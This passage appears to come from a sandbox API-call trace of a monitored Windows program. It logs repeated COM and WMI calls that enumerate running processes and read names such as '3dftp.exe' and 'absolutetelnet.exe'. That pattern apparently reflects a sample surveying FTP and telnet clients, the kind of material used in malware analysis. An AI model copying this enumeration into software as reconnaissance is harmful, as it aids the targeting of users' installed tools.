[2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.892] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.892] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8cfe8) returned 0x0 [0224.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8cfe8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.893] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8cfe8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb8118) returned 0x0 [0224.893] WbemDefPath:IUnknown:Release (This=0x5e8cfe8) returned 0x0 [0224.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb8118) returned 0x0 [0224.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.893] WbemDefPath:IUnknown:AddRef (This=0x5eb8118) returned 0x3 [0224.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.893] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8cff8) returned 0x0 [0224.893] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8cff8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.894] WbemDefPath:IUnknown:Release (This=0x5e8cff8) returned 0x3 [0224.894] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.894] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.894] WbemDefPath:IUnknown:Release (This=0x5eb8118) returned 0x2 [0224.894] WbemDefPath:IUnknown:Release (This=0x5eb8118) returned 0x1 [0224.894] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.894] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.894] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb8118, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb8118) returned 0x0 [0224.894] WbemDefPath:IUnknown:AddRef (This=0x5eb8118) returned 0x3 [0224.894] WbemDefPath:IUnknown:Release (This=0x5eb8118) returned 0x2 [0224.894] WbemDefPath:IWbemPath:SetText (This=0x5eb8118, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2972\"") returned 0x0 [0224.894] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.894] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.894] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.894] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.894] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.894] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.894] IWbemClassObject:Get (in: This=0x7433c8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ebb20*=0, plFlavor=0x26ebb24*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x26ebb20*=8, plFlavor=0x26ebb24*=0) returned 0x0 [0224.895] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0224.895] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0224.895] IWbemClassObject:Get (in: This=0x7433c8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ebb20*=8, plFlavor=0x26ebb24*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="3dftp.exe", varVal2=0x0), pType=0x26ebb20*=8, plFlavor=0x26ebb24*=0) returned 0x0 [0224.895] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0224.895] SysStringByteLen (bstr="3dftp.exe") returned 0x12 [0224.895] CoTaskMemAlloc (cb=0x4) returned 0x5e8d028 [0224.895] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8d028, puReturned=0x26dde18 | out: apObjects=0x5e8d028*=0x743560, puReturned=0x26dde18*=0x1) returned 0x0 [0224.896] IUnknown:QueryInterface (in: This=0x743560, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x743560) returned 0x0 [0224.896] IUnknown:QueryInterface (in: This=0x743560, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.896] IUnknown:QueryInterface (in: This=0x743560, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.897] IUnknown:AddRef (This=0x743560) returned 0x3 [0224.897] IUnknown:QueryInterface (in: This=0x743560, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.897] IUnknown:QueryInterface (in: This=0x743560, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.897] IUnknown:QueryInterface (in: This=0x743560, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x743564) returned 0x0 [0224.897] IMarshal:GetUnmarshalClass (in: This=0x743564, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.897] IUnknown:Release (This=0x743564) returned 0x3 [0224.897] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.897] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.897] IUnknown:QueryInterface (in: This=0x743560, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.897] IUnknown:Release (This=0x743560) returned 0x2 [0224.897] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.897] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.897] IUnknown:QueryInterface (in: This=0x743560, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x743560) returned 0x0 [0224.898] IUnknown:AddRef (This=0x743560) returned 0x4 [0224.898] IUnknown:Release (This=0x743560) returned 0x3 [0224.898] IUnknown:Release (This=0x743560) returned 0x2 [0224.898] CoTaskMemFree (pv=0x5e8d028) [0224.898] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.898] IUnknown:AddRef (This=0x743560) returned 0x3 [0224.898] IWbemClassObject:Get (in: This=0x743560, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.899] IWbemClassObject:Get (in: This=0x743560, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2980\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.899] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2980\"") returned 0x66 [0224.899] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2980\"") returned 0x66 [0224.899] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.899] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.899] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.899] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.900] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8d028) returned 0x0 [0224.900] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8d028, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.900] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8d028, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb81f8) returned 0x0 [0224.900] WbemDefPath:IUnknown:Release (This=0x5e8d028) returned 0x0 [0224.900] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb81f8) returned 0x0 [0224.900] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.901] WbemDefPath:IUnknown:AddRef (This=0x5eb81f8) returned 0x3 [0224.901] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.901] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.901] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8d038) returned 0x0 [0224.901] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8d038, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.901] WbemDefPath:IUnknown:Release (This=0x5e8d038) returned 0x3 [0224.901] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.901] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.901] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.901] WbemDefPath:IUnknown:Release (This=0x5eb81f8) returned 0x2 [0224.901] WbemDefPath:IUnknown:Release (This=0x5eb81f8) returned 0x1 [0224.901] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.901] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.901] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb81f8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb81f8) returned 0x0 [0224.901] WbemDefPath:IUnknown:AddRef (This=0x5eb81f8) returned 0x3 [0224.901] WbemDefPath:IUnknown:Release (This=0x5eb81f8) returned 0x2 [0224.901] WbemDefPath:IWbemPath:SetText (This=0x5eb81f8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2980\"") returned 0x0 [0224.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.901] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.901] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.901] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.902] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.902] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.902] IWbemClassObject:Get (in: This=0x743560, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ec384*=0, plFlavor=0x26ec388*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x26ec384*=8, plFlavor=0x26ec388*=0) returned 0x0 [0224.902] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0224.902] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0224.902] IWbemClassObject:Get (in: This=0x743560, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ec384*=8, plFlavor=0x26ec388*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="absolutetelnet.exe", varVal2=0x0), pType=0x26ec384*=8, plFlavor=0x26ec388*=0) returned 0x0 [0224.902] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0224.902] SysStringByteLen (bstr="absolutetelnet.exe") returned 0x24 [0224.902] CoTaskMemAlloc (cb=0x4) returned 0x5e8d068 [0224.902] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8d068, puReturned=0x26dde18 | out: apObjects=0x5e8d068*=0x7436f8, puReturned=0x26dde18*=0x1) returned 0x0 [0224.903] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7436f8) returned 0x0 [0224.903] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.903] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.904] IUnknown:AddRef (This=0x7436f8) returned 0x3 [0224.904] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.904] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.904] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7436fc) returned 0x0 [0224.904] IMarshal:GetUnmarshalClass (in: This=0x7436fc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.904] IUnknown:Release (This=0x7436fc) returned 0x3 [0224.904] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.904] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.904] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.904] IUnknown:Release (This=0x7436f8) returned 0x2 [0224.904] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.904] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.904] IUnknown:QueryInterface (in: This=0x7436f8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7436f8) returned 0x0 [0224.904] IUnknown:AddRef (This=0x7436f8) returned 0x4 [0224.904] IUnknown:Release (This=0x7436f8) returned 0x3 [0224.905] IUnknown:Release (This=0x7436f8) returned 0x2 [0224.905] CoTaskMemFree (pv=0x5e8d068) [0224.905] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.905] IUnknown:AddRef (This=0x7436f8) returned 0x3 [0224.905] IWbemClassObject:Get (in: This=0x7436f8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.905] IWbemClassObject:Get (in: This=0x7436f8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, 